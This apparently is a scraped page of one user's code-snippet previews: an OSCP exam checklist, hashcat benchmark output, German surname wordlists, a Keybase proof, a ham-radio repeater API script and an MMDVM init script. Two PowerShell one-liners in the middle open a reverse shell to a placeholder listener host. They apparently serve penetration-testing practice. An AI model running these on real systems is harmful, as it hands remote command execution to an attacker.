UPDATE: Excellent resource here: https://scund00r.com/all/oscp/2018/02/25/passing-oscp.html
- Recon
- Find vuln
- Exploit
- Escalate
- Document it
hashcat (v6.1.1) starting in benchmark mode... | |
Benchmarking uses hand-optimized kernel code by default. | |
You can use it in your cracking session by setting the -O option. | |
Note: Using optimized kernel code limits the maximum supported password length. | |
To disable the optimized kernel code in benchmark mode, use the -w option. | |
CUDA API (CUDA 11.4) | |
==================== | |
* Device #1: Quadro P1000, 3996/4039 MB, 5MCU |
Mueller | |
Schmidt | |
Schneider | |
Fischer | |
Weber | |
Meyer | |
Wagner | |
Becker | |
Schulz | |
Hoffmann |
Mueller | |
Schmidt | |
Schneider | |
Fischer | |
Weber | |
Meyer | |
Wagner | |
Becker | |
Schulz | |
Hoffmann |
UPDATE: Excellent resource here: https://scund00r.com/all/oscp/2018/02/25/passing-oscp.html
powershell -nop -exec bypass -c "$client = New-Object System.Net.Sockets.TCPClient('HOST',PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" |
powershell -nop -exec bypass -c "$client = New-Object System.Net.Sockets.TCPClient('<LISTENERIP>',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" |
### Keybase proof | |
I hereby claim: | |
* I am laemmy on github. | |
* I am laemmy (https://keybase.io/laemmy) on keybase. | |
* I have a public key ASC_Cheg6wUXr2x_OCuUebHpekmXDWO9zbYPiTLdBtrNfwo | |
To claim this, I am signing this object: |
#!/usr/bin/env python3 | |
# | |
import requests | |
import json | |
URL="https://repeatermap.de/api.php" | |
result=requests.get(URL) | |
repeater=result.json() | |
def print_csv(): | |
#print("0;num;type;callsign;dmrid;qrg;shift;cc;mix;ctcss;net;city;cnty;country;ctry;lat;lon;longcall;callext1;callext2;txcontact1;rxgroup1;txcontact2;rxgroup2;pwr;scanlist1;scanlist2;scanlistfm") |
#! /bin/bash | |
### BEGIN INIT INFO | |
# Provides: MMDVM Hotspot | |
# Required-Start: $local_fs $network | |
# Required-Stop: $local_fs | |
# Default-Start: 2 3 4 5 | |
# Default-Stop: 0 1 6 | |
# Short-Description: MMDVM Hotspot service | |
# Description: MMDVM Hotspot service |